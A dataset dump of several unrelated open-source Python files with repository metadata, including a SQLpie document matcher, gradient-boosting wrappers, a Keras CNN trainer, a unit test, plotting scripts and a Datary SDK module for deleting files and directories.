] | null | null | null |
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 1
|
2016-02-01T01:57:54.000Z
|
2016-02-01T01:57:54.000Z
|
# -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import g
import sqlpie
import math, json
class Matcher(object):
def __init__(self):
pass
@staticmethod
def match_single(source_bucket, document_id, search_bucket, max_matches=1, filter_query=""):
# Read Doc, Get top N top idf terms, and use those in the query.
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches)
return results
@staticmethod
def match_all(source_bucket, search_bucket, max_matches, filter_query, output_predicate=None):
engine = sqlpie.Searcher(filter_query)
num_observations = 0
if output_predicate is None:
output_predicate = "match_" + source_bucket.lower().strip() + "_" + search_bucket.lower().strip()
# Delete observations from specific predicate (match_<bucket>_<search_bucket>)
sqlpie.Observation.remove({"predicate":output_predicate})
sb = sqlpie.Bucket(source_bucket)
sql = ["bucket_id = UNHEX(%s)", sb.bucket_id]
docs = sqlpie.Document.select(sql)
is_encoded_document_id = True
# Loop each document from bucket
for d in docs:
document_id = d[1]
# Get scored best matches for each document
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches, is_encoded_document_id)
observations = []
for r in results:
# Store scored matches/results as observations
num_observations = num_observations + 1
observation = {"subject_bucket":source_bucket, "object_bucket":search_bucket, "subject_id":document_id, \
"predicate":output_predicate, "object_id":r[sqlpie.Document.ID_FIELD], \
"value":r[sqlpie.Document.SCORE_FIELD]}
observations.append(sqlpie.Observation(observation))
if len(observations) > 0:
sqlpie.Observation.add_multiple(observations)
return (num_observations, output_predicate)
@staticmethod
def match_document(document, search_bucket, max_matches, filter_query):
term_ids = sqlpie.Indexer.parse_features(document, False, True)
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(None, None, search_bucket, max_matches, False, term_ids)
return results
| 40.671875
| 124
| 0.659624
| 300
| 2,603
| 5.473333
| 0.353333
| 0.065773
| 0.054811
| 0.08039
| 0.226553
| 0.207674
| 0.167479
| 0.167479
| 0.140682
| 0.08648
| 0
| 0.007176
| 0.25048
| 2,603
| 63
| 125
| 41.31746
| 0.834444
| 0.151364
| 0
| 0.195122
| 0
| 0
| 0.044211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0.02439
| 0.073171
| 0
| 0.268293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af664d7b09e7e9a2561541c3ca78ef9e440f0b18
| 5,554
|
py
|
Python
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-12T22:45:32.000Z
|
2021-11-12T22:45:32.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-15T22:14:10.000Z
|
2021-11-16T15:56:14.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | null | null | null |
#------------------------------------------------------------------------------
# Libraries
#------------------------------------------------------------------------------
# Standard
import numpy as np
import xgboost as xgb
import lightgbm as lgbm
#------------------------------------------------------------------------------
# XGBoost
#------------------------------------------------------------------------------
class XGBRegressor(xgb.XGBRegressor):
"""
This class copies verbatim the XGBoost regressor as of version 1.5.0
See: https://xgboost.readthedocs.io/en/latest/python/python_api.html#module-xgboost.sklearn
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
n_estimators=200, # Default 100
max_depth=None,
learning_rate=1,
verbosity=0,
objective='reg:squarederror',
booster=None,
tree_method=None,
n_jobs=1,
gamma=None,
min_child_weight=None,
max_delta_step=None,
subsample=0.8,
colsample_bytree=None,
colsample_bylevel=None,
colsample_bynode=0.8,
reg_alpha=None,
reg_lambda=1e-05,
scale_pos_weight=None,
base_score=None,
random_state=1991,
missing=np.nan,
num_parallel_tree=None,
monotone_constraints=None,
interaction_constraints=None,
importance_type='gain',
gpu_id=None,
validate_parameters=None,
enable_categorical=False,
predictor=None
):
super().__init__(
n_estimators=n_estimators,
max_depth=max_depth,
learning_rate=learning_rate,
verbosity=verbosity,
booster=booster,
tree_method=tree_method,
n_jobs=n_jobs,
gamma=gamma,
min_child_weight=min_child_weight,
max_delta_step=max_delta_step,
subsample=subsample,
colsample_bytree=colsample_bytree,
colsample_bylevel=colsample_bylevel,
colsample_bynode=colsample_bynode,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
scale_pos_weight=scale_pos_weight,
base_score=base_score,
random_state=random_state,
missing=missing,
num_parallel_tree=num_parallel_tree,
monotone_constraints=monotone_constraints,
interaction_constraints=interaction_constraints,
importance_type=importance_type,
gpu_id=gpu_id,
validate_parameters=validate_parameters,
enable_categorical=enable_categorical,
predictor=predictor,
)
# # Lazy implementation:
# class XGBRegressor(xgb.XGBRegressor):
# def __init__(self, **kwargs):
# super().__init__(**kwargs)
#------------------------------------------------------------------------------
# LightGBM
#------------------------------------------------------------------------------
class LGBMegressor(lgbm.LGBMRegressor):
"""
This class copies verbatim the LightGBM regressor as of version 3.2.1
See: https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.LGBMRegressor.html#lightgbm-lgbmregressor
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
boosting_type='gbdt',
num_leaves=31,
max_depth=-1,
learning_rate=0.1,
n_estimators=100,
subsample_for_bin=200000,
objective='regression',
class_weight=None,
min_split_gain=0.0,
min_child_weight=0.001,
min_child_samples=20,
subsample=1.0,
subsample_freq=0,
colsample_bytree=1.0,
reg_alpha=0.0,
reg_lambda=0.0,
random_state=None,
n_jobs=1,
silent='warn',
importance_type='split'
):
super().__init__(
boosting_type=boosting_type,
num_leaves=num_leaves,
max_depth=max_depth,
learning_rate=learning_rate,
n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin,
objective=objective,
class_weight=class_weight,
min_split_gain=min_split_gain,
min_child_weight=min_child_weight,
min_child_samples=min_child_samples,
subsample=subsample,
subsample_freq=subsample_freq,
colsample_bytree=colsample_bytree,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
random_state=random_state,
n_jobs=n_jobs,
silent=silent,
importance_type=importance_type
)
| 39.112676
| 111
| 0.46507
| 453
| 5,554
| 5.335541
| 0.267108
| 0.029789
| 0.034754
| 0.021101
| 0.13405
| 0.084402
| 0.061233
| 0.061233
| 0
| 0
| 0
| 0.015808
| 0.339395
| 5,554
| 142
| 112
| 39.112676
| 0.642954
| 0.239287
| 0
| 0.254545
| 0
| 0
| 0.010322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018182
| false
| 0
| 0.063636
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af66914d6ab60784b54d7bda3a416c150d4d2a44
| 5,125
|
py
|
Python
|
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Flatten
import keras.backend as K
import random
import os
import sys
sys.setrecursionlimit(1000000)
def data_load_module(tf):
file = open('int/' + tf + '_1_int_rev.csv')
lines = file.readlines()
file.close()
arr = np.load('npy/' + tf + '.abp.t.npy')
x = []; y = []; tl = []
for line in lines:
sl = line.split(',')
sid = int(sl[0])
#if float(sl[2]) > 60: continue
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def rejection(x, y, tl):
pos_idx = []
neg_idx = []
for i in range(len(y)):
if y[i][0] == 0:
pos_idx.append(i)
else:
neg_idx.append(i)
lp = len(pos_idx)
ln = len(neg_idx)
acc_cnt = lp / ln if lp > ln else ln / lp
tot_idx = []
if lp > ln:
tot_idx = pos_idx
for i in range(int(acc_cnt)):
tot_idx.extend(neg_idx)
else:
tot_idx = neg_idx
for i in range(int(acc_cnt)):
tot_idx.extend(pos_idx)
random.shuffle(tot_idx)
new_x = []
new_y = []
new_tl = []
for idx in tot_idx:
new_x.append(x[idx])
new_y.append(y[idx])
new_tl.append(tl[idx])
return new_x, new_y, new_tl
def data_load(train_list, test_list):
train_x = []; train_y = []; train_tl = []
for tf in train_list:
x, y, tl = data_load_module(tf)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
train_x, train_y, train_tl = rejection(train_x, train_y, train_tl)
test_x = []; test_y = []; test_tl = []
for tf in test_list:
x, y, tl = data_load_module(tf)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
return train_x, train_y, train_tl, test_x, test_y, test_tl
def fold_data_load(i):
train_x = []; train_y = []; train_tl = []
def create_model(ipt_dim):
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(ipt_dim, ipt_dim, 1)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(2, activation='softmax'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['binary_accuracy'])
return model
def performance_generator(tp, tn, fp, fn):
sen = tp / (tp + fn) if (tp + fn) > 0 else 0
spe = tn / (tn + fp) if (tn + fp) > 0 else 0
ppv = tp / (tp + fp) if (tp + fp) > 0 else 0
npv = tn / (tn + fn) if (tn + fn) > 0 else 0
npd = (sen + spe) / 2
acc = (tp + tn) / (tp + tn + fp + fn)
return [sen, spe, ppv, npv, npd, acc]
def counter(y):
pc = 0; nc = 0
for i in range(len(y)):
if round(y[i][0]) == 0:
pc += 1
else:
nc += 1
return pc, nc
def get_pred_perfomance(test_y, pred_y, time_line):
tp = 0; tn = 0; fp = 0; fn = 0;
tpt = 0; tnt = 0; fpt = 0; fnt = 0;
for i in range(len(pred_y)):
cp = round(pred_y[i][0])
ca = test_y[i][0]
if cp == ca:
if cp == 0:
tp += 1
tpt += time_line[i]
else:
tn += 1
tnt += time_line[i]
else:
if cp == 0:
fp += 1
fpt += time_line[i]
else:
fn += 1
fnt += time_line[i]
ca = performance_generator(tp, tn, fp, fn)
ta = performance_generator(tpt, tnt, fpt, fnt)
cs = str(tp) + ',' + str(tn) + ',' + str(fp) + ',' + str(fn)
for v in ca:
cs += ',' + str(v)
ts = str(tpt) + ',' + str(tnt) + ',' + str(fpt) + ',' + str(fnt)
for v in ta:
ts += ',' + str(v)
print('Count:' + cs)
print('Time:' + ts)
return cs + ',' + ts
def read_1_file(file, pos):
pid = file.split('.')[0].split('/')[-1]
f = open('int/'+pid+'_1_int_rev.csv')
lines = f.readlines()
f.close()
arr = np.load('npy/'+str(pos)+'/'+file)
x = []; y = []; tl = [];
for line in lines:
sl = line.split(',')
sid = int(sl[0])
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def read_module(pos):
files = os.listdir('npy/' + str(pos))
test_x = []; test_y = []; test_tl = [];
train_x = []; train_y = []; train_tl = [];
for file in files:
if 'rep' in file:
if 'non' in file:
x, y, tl = read_1_file(file, pos)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
else:
x, y, tl = read_1_file(file, pos)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
return [train_x, train_y, train_tl], [test_x, test_y, test_tl]
if __name__=='__main__':
pos = 2
print(str(pos))
train, test = read_module(pos)
model = create_model(64)
model.fit(np.array(train[0]), np.array(train[1]), validation_data=(np.array(test[0]), np.array(test[1])), epochs=50)
model.save('net/CNN/'+str(pos)+'_CNN50.net')
pred = model.predict(np.array(test[0]))
sentence = get_pred_perfomance(test[1], pred, test[2])
pen = open('CNN_result.csv', 'a')
pen.write('\n' + str(pos) + ',' + sentence)
pen.close()
| 26.832461
| 118
| 0.575415
| 872
| 5,125
| 3.222477
| 0.182339
| 0.006406
| 0.012811
| 0.029893
| 0.367972
| 0.339502
| 0.292883
| 0.233808
| 0.202491
| 0.202491
| 0
| 0.027145
| 0.238049
| 5,125
| 190
| 119
| 26.973684
| 0.692446
| 0.005854
| 0
| 0.269461
| 0
| 0
| 0.037299
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05988
| false
| 0
| 0.041916
| 0
| 0.155689
| 0.017964
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6cc52ba6e57b394d26f12154df2f51b1b57cc5
| 636
|
py
|
Python
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 19
|
2019-11-08T22:50:32.000Z
|
2022-03-14T22:29:21.000Z
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | null | null | null |
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 7
|
2020-06-15T08:03:41.000Z
|
2021-10-01T11:22:58.000Z
|
import unittest
import numpy as np
from src.layers.flatten import Flatten
class TestFlatten(unittest.TestCase):
def test_flatten(self):
batch_size = 10
n_h, n_w, n_c = 32, 32, 3
a_prev = np.random.randn(batch_size, n_h, n_w, n_c)
f = Flatten()
f.init((n_h, n_w, n_c))
self.assertEqual(f.get_output_dim(), n_h * n_w * n_c)
self.assertTupleEqual(f.forward(a_prev, False).shape, (batch_size, n_h * n_w * n_c))
da, _, _ = f.backward(a_prev)
self.assertTupleEqual(da.shape, (batch_size, n_h, n_w, n_c))
np.testing.assert_array_almost_equal(a_prev, da)
| 30.285714
| 92
| 0.641509
| 109
| 636
| 3.431193
| 0.412844
| 0.032086
| 0.048128
| 0.064171
| 0.216578
| 0.216578
| 0.200535
| 0.147059
| 0.106952
| 0
| 0
| 0.014433
| 0.237421
| 636
| 20
| 93
| 31.8
| 0.756701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.066667
| false
| 0
| 0.2
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6febf89f847660f4b9e84d576a390734dbb67d
| 2,214
|
py
|
Python
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | null | null | null |
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2020-08-07T13:04:43.000Z
|
2020-08-10T12:32:46.000Z
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2019-12-16T15:46:45.000Z
|
2019-12-16T15:46:45.000Z
|
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.tfr_helper as tfr_helper
os.environ["CUDA_VISIBLE_DEVICES"] = ""
tf.enable_eager_execution()
if __name__ == "__main__":
print("run IS2d_triangle")
# prefix = "val"
input_list_name = "lists/TFR_2dt_100k_unsorted_s50_areafix_train.lst"
with open(input_list_name) as fobj:
filename_list = [x.strip("\n") for x in fobj.readlines()]
print("input list hast {} files".format(len(filename_list)))
print("load&batch-test...")
raw_dataset = tf.data.TFRecordDataset(filename_list)
print(raw_dataset)
parsed_dataset = raw_dataset.map(tfr_helper.parse_t2d)
batch_size = 1000
max_batches = 10
parsed_dataset_batched = parsed_dataset.batch(batch_size)
# parsed_dataset_batched = parsed_dataset_batched.repeat(10)
print(parsed_dataset)
counter = 0
number_of_batches = 0
plt.figure()
min_area = 10000
for batch_idx, sample in enumerate(parsed_dataset_batched):
if batch_idx >= max_batches:
break
number_of_batches = batch_idx + 1
points = sample[1]["points"]
# points[batch_sample, point, component]
a_x = points[:, 0, 0]
a_y = points[:, 0, 1]
b_x = points[:, 1, 0]
b_y = points[:, 1, 1]
c_x = points[:, 2, 0]
c_y = points[:, 2, 1]
ab = np.sqrt((a_x - b_x) ** 2 + (a_y - b_y) ** 2)
bc = np.sqrt((b_x - c_x) ** 2 + (b_y - c_y) ** 2)
ca = np.sqrt((c_x - a_x) ** 2 + (c_y - a_y) ** 2)
areas = np.abs((a_x * (b_y - c_y) + b_x * (c_y - a_y) + c_x * (a_y - b_y)) / 2.0)
inner_circle = 2 * areas / (ab + bc + ca)
outer_circle = ab * bc * ca / (4.0 * areas)
min_area = np.minimum(min_area, np.min(areas))
print(areas)
print(inner_circle)
print(outer_circle)
plt.scatter(areas, inner_circle / outer_circle)
# print(a, a.shape)
print("min_area", min_area)
plt.show()
print("{} samples in list: {}".format(number_of_batches * batch_size, input_list_name))
print(" Done.")
print("Finished.")
| 31.183099
| 91
| 0.617435
| 337
| 2,214
| 3.738872
| 0.332344
| 0.072222
| 0.063492
| 0.04127
| 0.060317
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030686
| 0.249322
| 2,214
| 70
| 92
| 31.628571
| 0.727437
| 0.058717
| 0
| 0
| 0
| 0
| 0.09139
| 0.023569
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.096154
| 0
| 0.096154
| 0.230769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af71f9e9ddb2979aa18dd52c6ff6dae1a9583788
| 4,090
|
py
|
Python
|
Three-Column-Sortable-TableView.py
|
humberry/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 115
|
2015-03-01T20:22:19.000Z
|
2022-01-23T16:16:48.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 8
|
2015-01-05T10:12:24.000Z
|
2020-08-02T07:43:10.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 37
|
2015-05-10T03:24:33.000Z
|
2022-03-11T04:06:47.000Z
|
# coding: utf-8
import ui, os, datetime
from operator import itemgetter
class MyTableViewDataSource(object):
def __init__(self, row_height):
self.row_height = row_height
self.width = None
def tableview_number_of_rows(self, tableview, section):
return len(tableview.data_source.items)
def tableview_cell_for_row(self, tableview, section, row):
self.width, height = ui.get_screen_size()
cell = ui.TableViewCell()
cell.bounds = (0, 0, self.width, self.row_height)
for i in range(3):
self.make_labels(cell, tableview.data_source.items[row][i], i)
return cell
def make_labels(self, cell, text, pos):
label = ui.Label()
label.border_color = "lightgrey"
label.border_width = 0.5
if pos == 2:
label.text = str(datetime.datetime.fromtimestamp(text))
else:
label.text = str(text)
label.frame = (pos * self.width / 3, 0, self.width / 3, self.row_height)
label.alignment = ui.ALIGN_CENTER
cell.content_view.add_subview(label)
class MyTableView(ui.View):
def __init__(self):
self.dirs = []
self.files = []
self.order = 'asc'
self.active_button = None
self.button_height = 50
self.btn_name = self.make_buttons("Name")
self.btn_size = self.make_buttons("Size")
self.btn_date = self.make_buttons("Date")
self.tv = ui.TableView()
self.tv.row_height = 30
self.tv.data_source = MyTableViewDataSource(self.tv.row_height)
self.get_dir()
self.all_items = self.dirs + self.files
self.tv.data_source.items = self.all_items
self.name = "TableView-Test"
self.tv.allows_selection = False
self.add_subview(self.tv)
self.present("fullscreen")
def make_buttons(self, name):
button = ui.Button()
button.name = name
button.title = name
button.border_color = 'blue'
button.border_width = 1
button.corner_radius = 3
button.background_color = 'white'
button.action = self.btn_action
self.add_subview(button)
return button
def btn_action(self, sender):
names = [self.btn_name.name, self.btn_size.name, self.btn_date.name] #['Name', 'Size', 'Date']
sender_index = names.index(sender.name) #0/1/2
if self.order == 'asc':
self.order = 'desc'
self.all_items = sorted(self.all_items, key=itemgetter(sender_index))
else:
self.order = 'asc'
self.all_items = sorted(
self.all_items, key=itemgetter(sender_index), reverse=True
)
self.tv.data_source.items = self.all_items
self.tv.reload()
def layout(self):
self.tv.reload()
self.btn_name.frame = (
0 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_size.frame = (
1 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_date.frame = (
2 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.tv.frame = (
0,
self.button_height,
self.width,
self.height - self.button_height,
)
def get_dir(self):
path = os.getcwd()
if path == os.path.expanduser("~"):
self.dirs = []
else:
self.dirs = [["..", 0, 0.0]]
self.files = []
for entry in sorted(os.listdir(path)):
full_pathname = path + "/" + entry
if os.path.isdir(full_pathname):
date = os.path.getmtime(full_pathname)
self.dirs.append((entry, "<DIR>", date))
else:
size = os.path.getsize(full_pathname)
date = os.path.getmtime(full_pathname)
self.files.append((entry, size, date))
MyTableView()
| 31.953125
| 103
| 0.55868
| 494
| 4,090
| 4.461538
| 0.232794
| 0.049002
| 0.036298
| 0.024955
| 0.211434
| 0.194192
| 0.194192
| 0.194192
| 0.182849
| 0.107532
| 0
| 0.012686
| 0.325428
| 4,090
| 127
| 104
| 32.204724
| 0.786154
| 0.010269
| 0
| 0.238938
| 0
| 0
| 0.018793
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079646
| false
| 0
| 0.017699
| 0.00885
| 0.141593
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af7371f20bd26e4f799d725d92aa211ad0557f49
| 668
|
py
|
Python
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | 2
|
2020-10-12T11:33:00.000Z
|
2021-12-20T06:33:54.000Z
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot as pl
from matplotlib.colors import LogNorm
fn = '../pozo-steep-vegetated-pcl.npy'
pts = np.load(fn)
x, y = pts[:, 0], pts[:, 1]
ix = (0.2 * (x - x.min())).astype('int')
iy = (0.2 * (y - y.min())).astype('int')
shape = (100, 100)
#xb = np.arange(shape[1]+1)
#yb = np.arange(shape[0]+1)
xb = np.arange(x.min(), x.min()+500, 5)
yb = np.arange(y.min(), y.min()+500, 5)
bins = np.zeros(shape)
for j in range(len(ix)):
bins[iy[j], ix[j]] += 1
cmap = pl.cm.magma_r
norm = LogNorm()
pl.pcolormesh(xb, yb, bins,
cmap = cmap,
#norm = norm,
)
pl.colorbar()
pl.axes().set_aspect('equal')
pl.show()
| 22.266667
| 40
| 0.586826
| 121
| 668
| 3.223141
| 0.446281
| 0.082051
| 0.061538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045872
| 0.184132
| 668
| 29
| 41
| 23.034483
| 0.669725
| 0.095808
| 0
| 0
| 0
| 0
| 0.069884
| 0.051581
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.136364
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af74d606a269a83e28010d18de482c23c6ab0542
| 5,600
|
py
|
Python
|
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Datary sdk Remove Operations File
"""
import os
from urllib.parse import urljoin
from datary.auth import DataryAuth
from datary.operations.limits import DataryOperationLimits
import structlog
logger = structlog.getLogger(__name__)
class DataryRemoveOperation(DataryAuth, DataryOperationLimits):
"""
Datary RemoveOperation module class
"""
def delete_dir(self, wdir_uuid, path, basename):
"""
Delete directory.
-- NOT IN USE --
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
path str path to directory
basename str directory name
================ ============= ====================================
"""
logger.info(
"Delete directory in workdir.",
wdir_uuid=wdir_uuid,
basename=basename,
path=os.path.join(path, basename))
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "delete",
"filemode": 40000,
"basename": path,
"basename": basename}
response = self.request(
url, 'GET', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"Directory has been deleted in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
else:
logger.error(
"Fail to delete Directory in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
def delete_file(self, wdir_uuid, element):
"""
Delete file.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
element Dic element with path & basename
================ ============= ====================================
"""
logger.info(
"Delete file in workdir.",
element=element,
wdir_uuid=wdir_uuid)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {
"action": "remove",
"filemode": 100644,
"basename": element.get('path'),
"basename": element.get('basename')
}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"File has been deleted.",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
else:
logger.error(
"Fail to delete file in workdir",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
def delete_inode(self, wdir_uuid, inode):
"""
Delete using inode.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
inode str directory or file inode.
================ ============= ====================================
"""
logger.info("Delete by inode.", wdir_uuid=wdir_uuid, inode=inode)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "remove", "inode": inode}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info("Element has been deleted using inode.")
else:
logger.error(
"Fail to delete file by inode in workdir",
url=url,
workdir=wdir_uuid,
inode=inode)
def clear_index(self, wdir_uuid):
"""
Clear changes in repo.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
================ ============= ====================================
"""
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
response = self.request(url, 'DELETE', **{'headers': self.headers})
if response:
logger.info("Repo index has been cleared.")
return True
else:
logger.error(
"Fail to clean the workdir index",
url=url,
workdir=wdir_uuid)
return False
| 32.55814
| 78
| 0.411786
| 426
| 5,600
| 5.323944
| 0.201878
| 0.091711
| 0.046296
| 0.035273
| 0.564815
| 0.527778
| 0.518519
| 0.439594
| 0.415344
